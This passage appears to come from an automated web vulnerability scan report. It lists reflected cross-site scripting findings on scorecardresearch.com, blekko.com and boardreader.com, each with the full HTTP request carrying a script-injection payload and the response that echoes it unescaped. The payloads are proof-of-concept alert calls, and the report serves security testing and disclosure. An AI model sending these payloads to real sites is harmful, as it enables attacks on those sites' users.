This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=507003329d7a<script>alert(1)</script>1b41605cfe3&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"507003329d7a<script>alert(1)</script>1b41605cfe3", c4:"40443113", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

1.78. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 950d1<script>alert(1)</script>79857982068 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113950d1<script>alert(1)</script>79857982068&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113950d1<script>alert(1)</script>79857982068", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

1.79. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 9641e<script>alert(1)</script>c02414cca98 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=590678989641e<script>alert(1)</script>c02414cca98&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113", c5:"590678989641e<script>alert(1)</script>c02414cca98", c6:"", c10:"", c15:"", c16:"", r:""});

1.80. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7176f<script>alert(1)</script>cc305f915b3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=7176f<script>alert(1)</script>cc305f915b3& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:55 GMT
Date: Wed, 02 Feb 2011 15:31:55 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113", c5:"59067898", c6:"7176f<script>alert(1)</script>cc305f915b3", c10:"", c15:"", c16:"", r:""});

1.81. http://blekko.com/autocomplete [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload def48<script>alert(1)</script>a050df307b6 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=xdef48<script>alert(1)</script>a050df307b6 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fbl=2; v=1; sessionid=352926924

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:09 GMT
Vary: Accept-Encoding
Content-Length: 71
X-Blekko-PT: 168498ca1c43565ea8d9e21390a38f4b

{"suggestions":[],"query":"xdef48<script>alert(1)</script>a050df307b6"}

1.82. http://blekko.com/autocomplete [term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload d17f0<script>alert(1)</script>b1b056eeebb was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?term={searchTerms}d17f0<script>alert(1)</script>b1b056eeebb&lang={language?}&form=opensearch HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:04 GMT
Vary: Accept-Encoding
Content-Length: 58
X-Blekko-PT: 9997f158d202984eeb76c315478564b1

["{searchTerms}d17f0<script>alert(1)</script>b1b056eeebb"]

1.83. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/2mdn.net/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b358d'-alert(1)-'f4b7b9879fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/2mdn.net/x22?b358d'-alert(1)-'f4b7b9879fc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:19:53 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:54 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=2mdn.net%2Fx22&b358d'-alert(1)-'f4b7b9879fc=1&p=30&d=1288898394&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.84. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/2mdn.net/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebef7"><script>alert(1)</script>6f696982a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/2mdn.net/x22?ebef7"><script>alert(1)</script>6f696982a6d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:18:59 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:01 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/2mdn.net%2Fx22?ebef7"><script>alert(1)</script>6f696982a6d=1">
...[SNIP]...

1.85. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/aol.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94a63'-alert(1)-'782a59af270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/aol.com?94a63'-alert(1)-'782a59af270=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:02:03 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:02:10 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=aol.com&94a63'-alert(1)-'782a59af270=1&p=30&d=1288940530&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.86. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/aol.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e75"><script>alert(1)</script>f6043616387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/aol.com?f0e75"><script>alert(1)</script>f6043616387=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:01:40 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:01:45 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/aol.com?f0e75"><script>alert(1)</script>f6043616387=1">
...[SNIP]...

1.87. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/cafemom.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3ee"><script>alert(1)</script>40468857845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:05 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:18 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1">
...[SNIP]...

1.88. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/cafemom.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3d7'-alert(1)-'2f4ee664641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/cafemom.com?3c3d7'-alert(1)-'2f4ee664641=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:47 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=cafemom.com&3c3d7'-alert(1)-'2f4ee664641=1&p=30&d=1288939967&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

1.89. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/myegy.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f3c"><script>alert(1)</script>bb270b2c8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:29 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:58:37 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1">
...[SNIP]...

1.90. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/myegy.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1683'-alert(1)-'aae0d7e564f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/myegy.com?c1683'-alert(1)-'aae0d7e564f=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
